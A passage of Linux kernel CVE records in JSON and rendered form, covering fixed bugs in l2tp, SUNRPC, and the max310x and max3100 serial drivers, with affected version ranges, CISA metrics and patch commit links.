"version": "4.19.308",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.270",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.80",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.19",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.7",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.308",
"versionStartIncluding": "4.19.296",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.270",
"versionStartIncluding": "5.4.258",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.10.198",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.15.135",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.80",
"versionStartIncluding": "6.1.57",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.19",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.7",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "6.6",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "4.14.327",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.5.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nl2tp: pass correct message length to ip6_append_data\n\nl2tp_ip6_sendmsg needs to avoid accounting for the transport header\ntwice when splicing more data into an already partially-occupied skbuff.\n\nTo manage this, we check whether the skbuff contains data using\nskb_queue_empty when deciding how much data to append using\nip6_append_data.\n\nHowever, the code which performed the calculation was incorrect:\n\n ulen = len + skb_queue_empty(\u0026sk-\u003esk_write_queue) ? transhdrlen : 0;\n\n...due to C operator precedence, this ends up setting ulen to\ntranshdrlen for messages with a non-zero length, which results in\ncorrupted packets on the wire.\n\nAdd parentheses to correct the calculation in line with the original\nintent."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:54:40.861Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/4c3ce64bc9d36ca9164dd6c77ff144c121011aae"
},
{
"url": "https://git.kernel.org/stable/c/c1d3a84a67db910ce28a871273c992c3d7f9efb5"
},
{
"url": "https://git.kernel.org/stable/c/dcb4d14268595065c85dc5528056713928e17243"
},
{
"url": "https://git.kernel.org/stable/c/0da15a70395182ee8cb75716baf00dddc0bea38d"
},
{
"url": "https://git.kernel.org/stable/c/13cd1daeea848614e585b2c6ecc11ca9c8ab2500"
},
{
"url": "https://git.kernel.org/stable/c/804bd8650a3a2bf3432375f8c97d5049d845ce56"
},
{
"url": "https://git.kernel.org/stable/c/83340c66b498e49353530e41542500fc8a4782d6"
},
{
"url": "https://git.kernel.org/stable/c/359e54a93ab43d32ee1bff3c2f9f10cb9f6b6e79"
}
],
"title": "l2tp: pass correct message length to ip6_append_data",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26752",
"datePublished": "2024-04-03T17:00:37.340Z",
"dateReserved": "2024-02-19T14:20:24.169Z",
"dateUpdated": "2025-05-04T12:54:40.861Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27388 (GCVE-0-2024-27388)
Vulnerability from cvelistv5
Published
2024-05-01 13:05
Modified
2025-05-04 09:03
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
SUNRPC: fix some memleaks in gssx_dec_option_array
The creds and oa->data need to be freed in the error-handling paths after
their allocation. So this patch add these deallocations in the
corresponding paths.
References
| URL | Tags | ||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 1d658336b05f8697d6445834f8867f8ad5e4f735 Version: 1d658336b05f8697d6445834f8867f8ad5e4f735 Version: 1d658336b05f8697d6445834f8867f8ad5e4f735 Version: 1d658336b05f8697d6445834f8867f8ad5e4f735 Version: 1d658336b05f8697d6445834f8867f8ad5e4f735 Version: 1d658336b05f8697d6445834f8867f8ad5e4f735 Version: 1d658336b05f8697d6445834f8867f8ad5e4f735 Version: 1d658336b05f8697d6445834f8867f8ad5e4f735 Version: 1d658336b05f8697d6445834f8867f8ad5e4f735 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:34:52.507Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b97c37978ca825557d331c9012e0c1ddc0e42364"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bfa9d86d39a0fe4685f90c3529aa9bd62a9d97a8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bb336cd8d5ecb69c430ebe3e7bcff68471d93fa8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/dd292e884c649f9b1c18af0ec75ca90b390cd044"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/934212a623cbab851848b6de377eb476718c3e4c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5e6013ae2c8d420faea553d363935f65badd32c3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9806c2393cd2ab0a8e7bb9ffae02ce20e3112ec4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/996997d1fb2126feda550d6adcedcbd94911fc69"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3cfcfc102a5e57b021b786a755a38935e357797d"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-27388",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:43:49.125516Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:28.640Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/sunrpc/auth_gss/gss_rpc_xdr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "b97c37978ca825557d331c9012e0c1ddc0e42364",
"status": "affected",
"version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
"versionType": "git"
},
{
"lessThan": "bfa9d86d39a0fe4685f90c3529aa9bd62a9d97a8",
"status": "affected",
"version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
"versionType": "git"
},
{
"lessThan": "bb336cd8d5ecb69c430ebe3e7bcff68471d93fa8",
"status": "affected",
"version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
"versionType": "git"
},
{
"lessThan": "dd292e884c649f9b1c18af0ec75ca90b390cd044",
"status": "affected",
"version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
"versionType": "git"
},
{
"lessThan": "934212a623cbab851848b6de377eb476718c3e4c",
"status": "affected",
"version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
"versionType": "git"
},
{
"lessThan": "5e6013ae2c8d420faea553d363935f65badd32c3",
"status": "affected",
"version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
"versionType": "git"
},
{
"lessThan": "9806c2393cd2ab0a8e7bb9ffae02ce20e3112ec4",
"status": "affected",
"version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
"versionType": "git"
},
{
"lessThan": "996997d1fb2126feda550d6adcedcbd94911fc69",
"status": "affected",
"version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
"versionType": "git"
},
{
"lessThan": "3cfcfc102a5e57b021b786a755a38935e357797d",
"status": "affected",
"version": "1d658336b05f8697d6445834f8867f8ad5e4f735",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/sunrpc/auth_gss/gss_rpc_xdr.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.10"
},
{
"lessThan": "3.10",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.311",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "3.10",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "3.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nSUNRPC: fix some memleaks in gssx_dec_option_array\n\nThe creds and oa-\u003edata need to be freed in the error-handling paths after\ntheir allocation. So this patch add these deallocations in the\ncorresponding paths."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:03:54.661Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/b97c37978ca825557d331c9012e0c1ddc0e42364"
},
{
"url": "https://git.kernel.org/stable/c/bfa9d86d39a0fe4685f90c3529aa9bd62a9d97a8"
},
{
"url": "https://git.kernel.org/stable/c/bb336cd8d5ecb69c430ebe3e7bcff68471d93fa8"
},
{
"url": "https://git.kernel.org/stable/c/dd292e884c649f9b1c18af0ec75ca90b390cd044"
},
{
"url": "https://git.kernel.org/stable/c/934212a623cbab851848b6de377eb476718c3e4c"
},
{
"url": "https://git.kernel.org/stable/c/5e6013ae2c8d420faea553d363935f65badd32c3"
},
{
"url": "https://git.kernel.org/stable/c/9806c2393cd2ab0a8e7bb9ffae02ce20e3112ec4"
},
{
"url": "https://git.kernel.org/stable/c/996997d1fb2126feda550d6adcedcbd94911fc69"
},
{
"url": "https://git.kernel.org/stable/c/3cfcfc102a5e57b021b786a755a38935e357797d"
}
],
"title": "SUNRPC: fix some memleaks in gssx_dec_option_array",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27388",
"datePublished": "2024-05-01T13:05:05.518Z",
"dateReserved": "2024-02-25T13:47:42.676Z",
"dateUpdated": "2025-05-04T09:03:54.661Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26978 (GCVE-0-2024-26978)
Vulnerability from cvelistv5
Published
2024-05-01 05:20
Modified
2025-05-04 09:01
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
serial: max310x: fix NULL pointer dereference in I2C instantiation
When trying to instantiate a max14830 device from userspace:
echo max14830 0x60 > /sys/bus/i2c/devices/i2c-2/new_device
we get the following error:
Unable to handle kernel NULL pointer dereference at virtual address...
...
Call trace:
max310x_i2c_probe+0x48/0x170 [max310x]
i2c_device_probe+0x150/0x2a0
...
Add check for validity of devtype to prevent the error, and abort probe
with a meaningful error message.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: f5c252aaa1be5d38604e58e9bd335065f767d0d8 Version: 85d79478710ad2cbf11857aec107084a7104943e Version: 2e1f2d9a9bdbe12ee475c82a45ac46a278e8049a Version: 2e1f2d9a9bdbe12ee475c82a45ac46a278e8049a Version: 2e1f2d9a9bdbe12ee475c82a45ac46a278e8049a Version: 2e1f2d9a9bdbe12ee475c82a45ac46a278e8049a Version: 2e1f2d9a9bdbe12ee475c82a45ac46a278e8049a |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26978",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-06T18:50:02.480775Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-476",
"description": "CWE-476 NULL Pointer Dereference",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-06-06T18:50:27.641Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:05.869Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7d271b798add90c6196539167c019d0817285cf0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c45e53c27b78afd6c81fc25608003576f27b5735"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/12609c76b755dbeb1645c0aacc0f0f4743b2eff3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2160ad6861c4a21d3fa553d7b2aaec6634a37f8a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5cd8af02b466e1beeae13e2de3dc58fcc7925e5a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/aeca49661fd02fd56fb026768b580ce301b45733"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0d27056c24efd3d63a03f3edfbcfc4827086b110"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/max310x.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "7d271b798add90c6196539167c019d0817285cf0",
"status": "affected",
"version": "f5c252aaa1be5d38604e58e9bd335065f767d0d8",
"versionType": "git"
},
{
"lessThan": "c45e53c27b78afd6c81fc25608003576f27b5735",
"status": "affected",
"version": "85d79478710ad2cbf11857aec107084a7104943e",
"versionType": "git"
},
{
"lessThan": "12609c76b755dbeb1645c0aacc0f0f4743b2eff3",
"status": "affected",
"version": "2e1f2d9a9bdbe12ee475c82a45ac46a278e8049a",
"versionType": "git"
},
{
"lessThan": "2160ad6861c4a21d3fa553d7b2aaec6634a37f8a",
"status": "affected",
"version": "2e1f2d9a9bdbe12ee475c82a45ac46a278e8049a",
"versionType": "git"
},
{
"lessThan": "5cd8af02b466e1beeae13e2de3dc58fcc7925e5a",
"status": "affected",
"version": "2e1f2d9a9bdbe12ee475c82a45ac46a278e8049a",
"versionType": "git"
},
{
"lessThan": "aeca49661fd02fd56fb026768b580ce301b45733",
"status": "affected",
"version": "2e1f2d9a9bdbe12ee475c82a45ac46a278e8049a",
"versionType": "git"
},
{
"lessThan": "0d27056c24efd3d63a03f3edfbcfc4827086b110",
"status": "affected",
"version": "2e1f2d9a9bdbe12ee475c82a45ac46a278e8049a",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/max310x.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "6.0"
},
{
"lessThan": "6.0",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.12",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.274",
"versionStartIncluding": "5.4.272",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.215",
"versionStartIncluding": "5.10.213",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.84",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.24",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.12",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.3",
"versionStartIncluding": "6.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nserial: max310x: fix NULL pointer dereference in I2C instantiation\n\nWhen trying to instantiate a max14830 device from userspace:\n\n echo max14830 0x60 \u003e /sys/bus/i2c/devices/i2c-2/new_device\n\nwe get the following error:\n\n Unable to handle kernel NULL pointer dereference at virtual address...\n ...\n Call trace:\n max310x_i2c_probe+0x48/0x170 [max310x]\n i2c_device_probe+0x150/0x2a0\n ...\n\nAdd check for validity of devtype to prevent the error, and abort probe\nwith a meaningful error message."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:01:21.630Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/7d271b798add90c6196539167c019d0817285cf0"
},
{
"url": "https://git.kernel.org/stable/c/c45e53c27b78afd6c81fc25608003576f27b5735"
},
{
"url": "https://git.kernel.org/stable/c/12609c76b755dbeb1645c0aacc0f0f4743b2eff3"
},
{
"url": "https://git.kernel.org/stable/c/2160ad6861c4a21d3fa553d7b2aaec6634a37f8a"
},
{
"url": "https://git.kernel.org/stable/c/5cd8af02b466e1beeae13e2de3dc58fcc7925e5a"
},
{
"url": "https://git.kernel.org/stable/c/aeca49661fd02fd56fb026768b580ce301b45733"
},
{
"url": "https://git.kernel.org/stable/c/0d27056c24efd3d63a03f3edfbcfc4827086b110"
}
],
"title": "serial: max310x: fix NULL pointer dereference in I2C instantiation",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26978",
"datePublished": "2024-05-01T05:20:33.457Z",
"dateReserved": "2024-02-19T14:20:24.203Z",
"dateUpdated": "2025-05-04T09:01:21.630Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-38634 (GCVE-0-2024-38634)
Vulnerability from cvelistv5
Published
2024-06-21 10:18
Modified
2025-11-04 17:21
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
serial: max3100: Lock port->lock when calling uart_handle_cts_change()
uart_handle_cts_change() has to be called with port lock taken,
Since we run it in a separate work, the lock may not be taken at
the time of running. Make sure that it's taken by explicitly doing
that. Without it we got a splat:
WARNING: CPU: 0 PID: 10 at drivers/tty/serial/serial_core.c:3491 uart_handle_cts_change+0xa6/0xb0
...
Workqueue: max3100-0 max3100_work [max3100]
RIP: 0010:uart_handle_cts_change+0xa6/0xb0
...
max3100_handlerx+0xc5/0x110 [max3100]
max3100_work+0x12a/0x340 [max3100]
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 Version: 7831d56b0a3544cbb6f82f76c34ca95e24d5b676 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-38634",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-21T13:19:09.330989Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-21T13:19:18.846Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2025-11-04T17:21:53.204Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/44b38924135d2093e2ec1812969464845dd66dc9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ea9b35372b58ac2931bfc1d5bc25e839d1221e30"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/cc121e3722a0a2c8f716ef991e5425b180a5fb94"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/78dbda51bb4241b88a52d71620f06231a341f9ba"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8296bb9e5925b6634259c5d4daee88f0cc0884ec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93df2fba6c7dfa9a2f08546ea9a5ca4728758458"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/865b30c8661924ee9145f442bf32cea549faa869"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/77ab53371a2066fdf9b895246505f5ef5a4b5d47"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/max3100.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "44b38924135d2093e2ec1812969464845dd66dc9",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "ea9b35372b58ac2931bfc1d5bc25e839d1221e30",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "cc121e3722a0a2c8f716ef991e5425b180a5fb94",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "78dbda51bb4241b88a52d71620f06231a341f9ba",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "8296bb9e5925b6634259c5d4daee88f0cc0884ec",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "93df2fba6c7dfa9a2f08546ea9a5ca4728758458",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "865b30c8661924ee9145f442bf32cea549faa869",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
},
{
"lessThan": "77ab53371a2066fdf9b895246505f5ef5a4b5d47",
"status": "affected",
"version": "7831d56b0a3544cbb6f82f76c34ca95e24d5b676",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/tty/serial/max3100.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "2.6.30"
},
{
